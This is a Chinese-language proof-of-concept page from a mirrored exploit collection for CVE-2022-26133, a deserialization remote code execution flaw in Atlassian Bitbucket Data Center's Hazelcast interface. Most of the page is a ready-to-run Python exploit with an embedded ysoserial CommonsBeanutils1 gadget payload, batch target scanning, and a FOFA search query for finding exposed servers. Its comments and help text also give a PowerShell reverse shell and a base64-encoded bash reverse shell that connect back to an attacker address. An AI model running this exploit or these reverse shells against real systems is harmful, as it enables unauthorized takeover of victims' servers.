admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-08-13 03:17:15 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

197 lines
12 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133
## 漏洞描述
Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。
## 漏洞影响
```
Atlassian Bitbucket Data Center >= 5.14.x
Atlassian Bitbucket Data Center 6.x
Atlassian Bitbucket Data Center < 7.6.14
Atlassian Bitbucket Data Center < 7.16.x
Atlassian Bitbucket Data Center < 7.17.6
Atlassian Bitbucket Data Center < 7.18.4
Atlassian Bitbucket Data Center < 7.19.4
Atlassian Bitbucket Data Center 7.20.0
```
## 网络测绘
```
app="ATLASSIAN-Bitbucket"
```
## 漏洞复现
exp
```
python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt
```
```
#!/usr/bin/env python3
## -*- coding: utf_8 -*-
## @Time : 2022/5/7 0007 9:58
from urllib.parse import urlparse
import argparse
import requests
import logging
import socket
import time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
'''
Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)
## Windows Reverse Shell(未免杀)
command: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"
## Linux Reverse Shell
command: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
'''
class CVE_2022_26133:
def __init__(self, target):
parse = urlparse(target)
self.url = parse.scheme + "://" + parse.netloc
self.log_init()
self.timeout = 3
self.proxies = None
## self.proxies = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}
def log_init(self):
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def str_to_hex(self, param):
ll = []
for i in param:
ll.append(hex(ord(i)).split("x")[1])
return "".join(ll)
def dec_to_hex(self, param, n):
if n == 4:
return '{:04x}'.format(param)
elif n == 8:
return '{:08x}'.format(param)
def get_socket_connect(self):
try:
parse = urlparse(self.url)
target = parse.netloc.split(":")[0]
## default port
port = 5701
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(self.timeout)
sock.connect((target, port))
return sock
except Exception as msg:
logging.critical("target is not reachable, " + str(msg))
def generate_payload(self, cluster, command):
payload = cluster.hex()
payload += "FFFFFF9C"
## yso cb1 payload
payload += "ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870"
payload += self.dec_to_hex((1684 + len(command)), 8)
payload += "CAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01"
payload += self.dec_to_hex((len(command)), 4)
payload += self.str_to_hex(command)
payload += "08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001D79736F73657269616C2F50776E6572383931393230313938343538303001001F4C79736F73657269616C2F50776E657238393139323031393834353830303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78"
## logging.info("payload: " + payload)
return payload
def verify(self, Batch=False):
logging.debug("Checking " + self.url)
try:
sock = self.get_socket_connect()
if sock is not None:
## get ClusterName
data = "000000027361"
sock.send(bytes.fromhex(data))
ClusterName = sock.recv(4) + sock.recv(1024)
sock.close()
if len(ClusterName) != 0:
logging.info("\033[0;36mTarget is vulnerable.\033[0m")
if Batch != False:
with open("success.txt", "a+") as fo:
fo.write(self.url + "\n")
fo.close()
return ClusterName
except Exception as msg:
logging.critical(msg)
def exploit(self, command):
ClusterName = self.verify()
if ClusterName is not None:
try:
sock = self.get_socket_connect()
if sock is not None:
logging.info("command => " + command)
payload = self.generate_payload(ClusterName, command)
sock.send(bytes.fromhex(payload))
time.sleep(0.5)
res = sock.recv(1024)
sock.close()
if len(res) != 0:
logging.info("payload send success, check it.")
except Exception as msg:
if isinstance(msg, ConnectionResetError):
logging.warning("ConnectionResetError: Payload maybe execute successful once target is Linux, Check it.")
else:
logging.critical(msg)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='url', help='input target url, eg: http://192.168.1.1:7990/')
parser.add_argument('--verify', action='store_true', default=False, help='verify mode, verify if target is vulnerable.')
parser.add_argument('-c', dest='command', help='exploit mode, eg: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}')
parser.add_argument('-f', dest='file', help='verify targets in the file if vulnerable.')
args = parser.parse_args()
print("""
______ _______ ____ ___ ____ ____ ____ __ _ __________
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \ / /_ / |___ /___ /
| | \ \ / /| _| _____ __) | | | |__) | __) |____ __) | '_ \| | |_ \ |_ \
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/| (_) | |___) |__) |
\____| \_/ |_____| |_____|\___/_____|_____| |_____|\___/|_|____/____/
""")
if args.verify:
CVE_2022_26133(args.url).verify()
elif args.file:
with open(args.file, 'r') as f:
targets = f.readlines()
f.close()
for target in targets:
CVE_2022_26133(target.strip()).verify(True)
elif args.command:
CVE_2022_26133(args.url).exploit(args.command)
```
## 漏洞修复
当前官方已发布最新版本建议受影响的用户及时更新升级到最新版本。链接如下https://www.atlassian.com/software/bitbucket/download-archives
Reference in New Issue View Git Blame Copy Permalink